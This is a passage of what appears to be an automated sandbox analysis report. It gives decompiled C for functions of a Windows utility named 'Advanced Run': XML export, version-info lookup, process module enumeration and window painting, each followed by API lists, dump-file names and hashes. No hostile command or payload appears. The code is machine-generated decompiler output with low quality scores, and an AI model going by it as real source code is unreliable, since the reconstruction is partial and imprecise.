                                                                                                  							wcscat(_t34, L"  ");
                                                                                                  						}
                                                                                                  					}
                                                                                                  					wcscat(_t34,  &_v516);
                                                                                                  					_t35 = _t35 + 1;
                                                                                                  				} while (_t35 < 0x80);
                                                                                                  				return _t34;
                                                                                                  			}









                                                                                                  0x00404fe0
                                                                                                  0x00404fe9
                                                                                                  0x00405000
                                                                                                  0x00405005
                                                                                                  0x00405009
                                                                                                  0x0040500c
                                                                                                  0x0040500e
                                                                                                  0x00405015
                                                                                                  0x00405016
                                                                                                  0x00405021
                                                                                                  0x00405026
                                                                                                  0x00405027
                                                                                                  0x0040502c
                                                                                                  0x00405031
                                                                                                  0x00405039
                                                                                                  0x0040503f
                                                                                                  0x00405044
                                                                                                  0x00405048
                                                                                                  0x0040504e
                                                                                                  0x00405056
                                                                                                  0x0040505c
                                                                                                  0x0040504e
                                                                                                  0x00405065
                                                                                                  0x0040506a
                                                                                                  0x00405072
                                                                                                  0x00405079

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: wcscat$_snwprintfmemset
                                                                                                  • String ID: %2.2X
                                                                                                  • API String ID: 2521778956-791839006
                                                                                                  • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                  • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                                                  • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                  • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 42%
                                                                                                  			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                  				void _v514;
                                                                                                  				char _v516;
                                                                                                  				void _v1026;
                                                                                                  				char _v1028;
                                                                                                  				void* __esi;
                                                                                                  				intOrPtr* _t16;
                                                                                                  				void* _t19;
                                                                                                  				intOrPtr* _t29;
                                                                                                  				char* _t31;
                                                                                                  
                                                                                                  				_t29 = __ecx;
                                                                                                  				_v516 = 0;
                                                                                                  				memset( &_v514, 0, 0x1fc);
                                                                                                  				_v1028 = 0;
                                                                                                  				memset( &_v1026, 0, 0x1fc);
                                                                                                  				_t16 = _t29;
                                                                                                  				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
                                                                                                  					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
                                                                                                  				} else {
                                                                                                  					_push(L"<?xml version=\"1.0\" ?>\r\n");
                                                                                                  				}
                                                                                                  				E00407343(_t16);
                                                                                                  				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
                                                                                                  				_t31 =  &_v516;
                                                                                                  				E00407250(_t31, _t19);
                                                                                                  				_push(_t31);
                                                                                                  				_push(L"<%s>\r\n");
                                                                                                  				_push(0xff);
                                                                                                  				_push( &_v1028);
                                                                                                  				L0040B1EC();
                                                                                                  				return E00407343(_t29, _a4,  &_v1028);
                                                                                                  			}












                                                                                                  0x00407d9c
                                                                                                  0x00407d9e
                                                                                                  0x00407da5
                                                                                                  0x00407db3
                                                                                                  0x00407dba
                                                                                                  0x00407dc5
                                                                                                  0x00407dc7
                                                                                                  0x00407dd0
                                                                                                  0x00407dc9
                                                                                                  0x00407dc9
                                                                                                  0x00407dc9
                                                                                                  0x00407dd8
                                                                                                  0x00407de1
                                                                                                  0x00407de5
                                                                                                  0x00407deb
                                                                                                  0x00407df2
                                                                                                  0x00407df3
                                                                                                  0x00407dfe
                                                                                                  0x00407e03
                                                                                                  0x00407e04
                                                                                                  0x00407e21

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • <%s>, xrefs: 00407DF3
                                                                                                  • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$_snwprintf
                                                                                                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                  • API String ID: 3473751417-2880344631
                                                                                                  • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                  • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                                                  • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                  • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 70%
                                                                                                  			E00403B3C(intOrPtr _a4) {
                                                                                                  				void _v526;
                                                                                                  				char _v528;
                                                                                                  				void _v2574;
                                                                                                  				char _v2576;
                                                                                                  				void* __edi;
                                                                                                  				intOrPtr _t29;
                                                                                                  
                                                                                                  				_v2576 = 0;
                                                                                                  				memset( &_v2574, 0, 0x7fe);
                                                                                                  				_v528 = 0;
                                                                                                  				memset( &_v526, 0, 0x208);
                                                                                                  				E00404AD9( &_v528);
                                                                                                  				_push( &_v528);
                                                                                                  				_push(L"\"%s\" /EXEFilename \"%%1\"");
                                                                                                  				_push(0x3ff);
                                                                                                  				_push( &_v2576);
                                                                                                  				L0040B1EC();
                                                                                                  				_t37 = _a4 + 0xa68;
                                                                                                  				E00404923(0x104, _a4 + 0xa68, L"exefile");
                                                                                                  				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
                                                                                                  				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
                                                                                                  				_t29 = E0040467A(_t37);
                                                                                                  				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
                                                                                                  				return _t29;
                                                                                                  			}









                                                                                                  0x00403b56
                                                                                                  0x00403b5d
                                                                                                  0x00403b6f
                                                                                                  0x00403b76
                                                                                                  0x00403b82
                                                                                                  0x00403b8d
                                                                                                  0x00403b8e
                                                                                                  0x00403b99
                                                                                                  0x00403b9e
                                                                                                  0x00403b9f
                                                                                                  0x00403ba7
                                                                                                  0x00403bb9
                                                                                                  0x00403bce
                                                                                                  0x00403be5
                                                                                                  0x00403bef
                                                                                                  0x00403bf8
                                                                                                  0x00403c00

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00403B5D
                                                                                                  • memset.MSVCRT ref: 00403B76
                                                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                  • _snwprintf.MSVCRT ref: 00403B9F
                                                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                    • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                    • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                                                    • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                                                    • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                    • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                                                  • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                                                  • API String ID: 1832587304-479876776
                                                                                                  • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                  • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                                                  • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                  • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
                                                                                                  				void* _v8;
                                                                                                  				int _v12;
                                                                                                  				short _v524;
                                                                                                  				char _v1036;
                                                                                                  				void* __edi;
                                                                                                  
                                                                                                  				wcscpy( &_v524, L"\\StringFileInfo\\");
                                                                                                  				wcscat( &_v524, _a8);
                                                                                                  				wcscat( &_v524, "\\");
                                                                                                  				wcscat( &_v524, _a12);
                                                                                                  				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
                                                                                                  					return 0;
                                                                                                  				}
                                                                                                  				_t34 =  &_v1036;
                                                                                                  				E00404923(0xff,  &_v1036, _v8);
                                                                                                  				E004049A2(_t34, __esi);
                                                                                                  				return 1;
                                                                                                  			}








                                                                                                  0x0040afd3
                                                                                                  0x0040afe2
                                                                                                  0x0040aff3
                                                                                                  0x0040b002
                                                                                                  0x0040b023
                                                                                                  0x00000000
                                                                                                  0x0040b047
                                                                                                  0x0040b02e
                                                                                                  0x0040b034
                                                                                                  0x0040b03c
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • wcscpy.MSVCRT ref: 0040AFD3
                                                                                                  • wcscat.MSVCRT ref: 0040AFE2
                                                                                                  • wcscat.MSVCRT ref: 0040AFF3
                                                                                                  • wcscat.MSVCRT ref: 0040B002
                                                                                                  • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                    • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                    • Part of subcall function 004049A2: lstrcpyW.KERNEL32 ref: 004049B7
                                                                                                    • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                  • String ID: \StringFileInfo\
                                                                                                  • API String ID: 393120378-2245444037
                                                                                                  • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                  • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                                                  • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                  • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: _snwprintfwcscpy
                                                                                                  • String ID: dialog_%d$general$menu_%d$strings
                                                                                                  • API String ID: 999028693-502967061
                                                                                                  • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                  • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                                                  • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                  • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 38%
                                                                                                  			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
                                                                                                  				void* _v0;
                                                                                                  				intOrPtr _v4;
                                                                                                  				intOrPtr _v8;
                                                                                                  				unsigned int _v12;
                                                                                                  				void* _v16;
                                                                                                  				char _v20;
                                                                                                  				char _v24;
                                                                                                  				intOrPtr _v32;
                                                                                                  				intOrPtr _v36;
                                                                                                  				intOrPtr _v44;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				intOrPtr _t58;
                                                                                                  				void* _t59;
                                                                                                  				void* _t69;
                                                                                                  				void* _t72;
                                                                                                  				intOrPtr _t78;
                                                                                                  				void _t89;
                                                                                                  				signed int _t90;
                                                                                                  				int _t98;
                                                                                                  				signed int _t105;
                                                                                                  				signed int _t106;
                                                                                                  				void* _t109;
                                                                                                  
                                                                                                  				_t106 = _t105 & 0xfffffff8;
                                                                                                  				E0040B550(0x8874, __ecx);
                                                                                                  				_t98 = 0;
                                                                                                  				_a8 = 0;
                                                                                                  				if(E00404BD3() == 0) {
                                                                                                  					L12:
                                                                                                  					__eflags =  *0x4101b8 - _t98; // 0x0
                                                                                                  					if(__eflags != 0) {
                                                                                                  						_t89 = _a4;
                                                                                                  						_t58 =  *0x40f83c(8, _t89);
                                                                                                  						__eflags = _t58 - 0xffffffff;
                                                                                                  						_v8 = _t58;
                                                                                                  						if(_t58 != 0xffffffff) {
                                                                                                  							_v0 = 1;
                                                                                                  							_a560 = 0x428;
                                                                                                  							_t59 =  *0x40f834(_t58,  &_a560);
                                                                                                  							while(1) {
                                                                                                  								__eflags = _t59;
                                                                                                  								if(_t59 == 0) {
                                                                                                  									goto L18;
                                                                                                  								}
                                                                                                  								memset( &_a8, _t98, 0x21c);
                                                                                                  								_a12 = _a580;
                                                                                                  								_a8 = _t89;
                                                                                                  								wcscpy( &_a16,  &_a1096);
                                                                                                  								_a540 = _a576;
                                                                                                  								_t106 = _t106 + 0x14;
                                                                                                  								_a544 = _a572;
                                                                                                  								_a552 = 0x428;
                                                                                                  								_t69 = E00409510(_a8,  &_a8);
                                                                                                  								__eflags = _t69;
                                                                                                  								if(_t69 != 0) {
                                                                                                  									_t59 =  *0x40f830(_v16,  &_a552);
                                                                                                  									continue;
                                                                                                  								}
                                                                                                  								goto L18;
                                                                                                  							}
                                                                                                  							goto L18;
                                                                                                  						}
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					_t109 =  *0x4101bc - _t98; // 0x0
                                                                                                  					if(_t109 == 0) {
                                                                                                  						goto L12;
                                                                                                  					} else {
                                                                                                  						_t72 = OpenProcess(0x410, 0, _a4);
                                                                                                  						_v0 = _t72;
                                                                                                  						if(_t72 != 0) {
                                                                                                  							_push( &_a4);
                                                                                                  							_push(0x8000);
                                                                                                  							_push( &_a2160);
                                                                                                  							_push(_t72);
                                                                                                  							if( *0x40f840() != 0) {
                                                                                                  								_t6 =  &_v12;
                                                                                                  								 *_t6 = _v12 >> 2;
                                                                                                  								_v8 = 1;
                                                                                                  								_t90 = 0;
                                                                                                  								if( *_t6 != 0) {
                                                                                                  									while(1) {
                                                                                                  										_a1616 = _t98;
                                                                                                  										memset( &_a1618, _t98, 0x208);
                                                                                                  										memset( &_a8, _t98, 0x21c);
                                                                                                  										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
                                                                                                  										_t106 = _t106 + 0x18;
                                                                                                  										_a8 = _a4;
                                                                                                  										_a12 = _t78;
                                                                                                  										 *0x40f838(_v16, _t78,  &_a1616, 0x104);
                                                                                                  										E0040920A( &_v0,  &_a1600);
                                                                                                  										_push(0xc);
                                                                                                  										_push( &_v20);
                                                                                                  										_push(_v4);
                                                                                                  										_push(_v32);
                                                                                                  										if( *0x40f844() != 0) {
                                                                                                  											_a508 = _v32;
                                                                                                  											_a512 = _v36;
                                                                                                  										}
                                                                                                  										if(E00409510(_a8,  &_v24) == 0) {
                                                                                                  											goto L18;
                                                                                                  										}
                                                                                                  										_t90 = _t90 + 1;
                                                                                                  										if(_t90 < _v44) {
                                                                                                  											_t98 = 0;
                                                                                                  											__eflags = 0;
                                                                                                  											continue;
                                                                                                  										} else {
                                                                                                  										}
                                                                                                  										goto L18;
                                                                                                  									}
                                                                                                  								}
                                                                                                  							}
                                                                                                  							L18:
                                                                                                  							CloseHandle(_v16);
                                                                                                  						}
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return _a8;
                                                                                                  			}


























                                                                                                  0x004092f3
                                                                                                  0x004092fb
                                                                                                  0x00409303
                                                                                                  0x00409305
                                                                                                  0x00409310
                                                                                                  0x00409433
                                                                                                  0x00409433
                                                                                                  0x00409439
                                                                                                  0x0040943f
                                                                                                  0x00409445
                                                                                                  0x0040944b
                                                                                                  0x0040944e
                                                                                                  0x00409452
                                                                                                  0x00409466
                                                                                                  0x0040946e
                                                                                                  0x00409475
                                                                                                  0x004094f7
                                                                                                  0x004094f7
                                                                                                  0x004094f9
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00409488
                                                                                                  0x00409494
                                                                                                  0x004094a5
                                                                                                  0x004094a9
                                                                                                  0x004094b5
                                                                                                  0x004094c3
                                                                                                  0x004094c6
                                                                                                  0x004094d5
                                                                                                  0x004094dc
                                                                                                  0x004094e1
                                                                                                  0x004094e3
                                                                                                  0x004094f1
                                                                                                  0x00000000
                                                                                                  0x004094f1
                                                                                                  0x00000000
                                                                                                  0x004094e3
                                                                                                  0x00000000
                                                                                                  0x004094f7
                                                                                                  0x00409452
                                                                                                  0x00409316
                                                                                                  0x00409316
                                                                                                  0x0040931c
                                                                                                  0x00000000
                                                                                                  0x00409322
                                                                                                  0x0040932b
                                                                                                  0x00409333
                                                                                                  0x00409337
                                                                                                  0x00409341
                                                                                                  0x00409342
                                                                                                  0x0040934e
                                                                                                  0x0040934f
                                                                                                  0x00409358
                                                                                                  0x0040935e
                                                                                                  0x0040935e
                                                                                                  0x00409363
                                                                                                  0x0040936b
                                                                                                  0x0040936d
                                                                                                  0x00409377
                                                                                                  0x00409385
                                                                                                  0x0040938d
                                                                                                  0x0040939d
                                                                                                  0x004093a5
                                                                                                  0x004093ac
                                                                                                  0x004093b4
                                                                                                  0x004093c5
                                                                                                  0x004093c9
                                                                                                  0x004093da
                                                                                                  0x004093df
                                                                                                  0x004093e5
                                                                                                  0x004093e6
                                                                                                  0x004093ea
                                                                                                  0x004093f6
                                                                                                  0x004093fc
                                                                                                  0x00409407
                                                                                                  0x00409407
                                                                                                  0x0040941d
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00409423
                                                                                                  0x00409428
                                                                                                  0x00409375
                                                                                                  0x00409375
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040942e
                                                                                                  0x00000000
                                                                                                  0x00409428
                                                                                                  0x00409377
                                                                                                  0x0040936d
                                                                                                  0x004094fb
                                                                                                  0x004094ff
                                                                                                  0x004094ff
                                                                                                  0x00409337
                                                                                                  0x0040931c
                                                                                                  0x0040950f

                                                                                                  APIs
                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                                                  • memset.MSVCRT ref: 0040938D
                                                                                                  • memset.MSVCRT ref: 0040939D
                                                                                                    • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                                                  • memset.MSVCRT ref: 00409488
                                                                                                  • wcscpy.MSVCRT ref: 004094A9
                                                                                                  • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 3300951397-0
                                                                                                  • Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                  • Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
                                                                                                  • Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                  • Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 44%
                                                                                                  			E00402EC8(void* __ebx) {
                                                                                                  				struct tagRECT _v20;
                                                                                                  				struct tagPAINTSTRUCT _v84;
                                                                                                  
                                                                                                  				GetClientRect( *(__ebx + 0x10),  &_v20);
                                                                                                  				_v20.left = _v20.right - GetSystemMetrics(0x15);
                                                                                                  				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
                                                                                                  				asm("movsd");
                                                                                                  				asm("movsd");
                                                                                                  				asm("movsd");
                                                                                                  				asm("movsd");
                                                                                                  				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
                                                                                                  				return EndPaint( *(__ebx + 0x10),  &_v84);
                                                                                                  			}





                                                                                                  0x00402ed7
                                                                                                  0x00402eee
                                                                                                  0x00402ef8
                                                                                                  0x00402f00
                                                                                                  0x00402f01
                                                                                                  0x00402f05
                                                                                                  0x00402f0a
                                                                                                  0x00402f1a
                                                                                                  0x00402f30

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                  • String ID:
                                                                                                  • API String ID: 19018683-0
                                                                                                  • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                  • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                                                  • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                  • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 50%
                                                                                                  			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                  				void _v514;
                                                                                                  				signed short _v516;
                                                                                                  				signed short* _t34;
                                                                                                  				signed int _t37;
                                                                                                  				void* _t40;
                                                                                                  				signed short* _t44;
                                                                                                  				void* _t46;
                                                                                                  
                                                                                                  				_t40 = __edi;
                                                                                                  				E00407343(__edi, _a4, L"<item>\r\n");
                                                                                                  				_t37 = 0;
                                                                                                  				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
                                                                                                  					do {
                                                                                                  						_v516 = _v516 & 0x00000000;
                                                                                                  						memset( &_v514, 0, 0x1fc);
                                                                                                  						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
                                                                                                  						_t44 =  &_v516;
                                                                                                  						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
                                                                                                  						_t34 = _t44;
                                                                                                  						_push(_t34);
                                                                                                  						_push( *((intOrPtr*)(__edi + 0x64)));
                                                                                                  						_push(_t34);
                                                                                                  						_push(L"<%s>%s</%s>\r\n");
                                                                                                  						_push(0x2000);
                                                                                                  						_push( *((intOrPtr*)(__edi + 0x68)));
                                                                                                  						L0040B1EC();
                                                                                                  						_t46 = _t46 + 0x24;
                                                                                                  						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
                                                                                                  						_t37 = _t37 + 1;
                                                                                                  					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
                                                                                                  				}
                                                                                                  				return E00407343(_t40, _a4, L"</item>\r\n");
                                                                                                  			}










                                                                                                  0x004079a4
                                                                                                  0x004079b8
                                                                                                  0x004079bd
                                                                                                  0x004079c2
                                                                                                  0x004079c5
                                                                                                  0x004079c5
                                                                                                  0x004079db
                                                                                                  0x004079f7
                                                                                                  0x00407a06
                                                                                                  0x00407a0c
                                                                                                  0x00407a11
                                                                                                  0x00407a13
                                                                                                  0x00407a14
                                                                                                  0x00407a17
                                                                                                  0x00407a18
                                                                                                  0x00407a1d
                                                                                                  0x00407a22
                                                                                                  0x00407a25
                                                                                                  0x00407a2a
                                                                                                  0x00407a35
                                                                                                  0x00407a3a
                                                                                                  0x00407a3b
                                                                                                  0x00407a40
                                                                                                  0x00407a52

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 004079DB
                                                                                                    • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                                                    • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                    • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                  • _snwprintf.MSVCRT ref: 00407A25
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                  • API String ID: 1775345501-2769808009
                                                                                                  • Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                  • Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
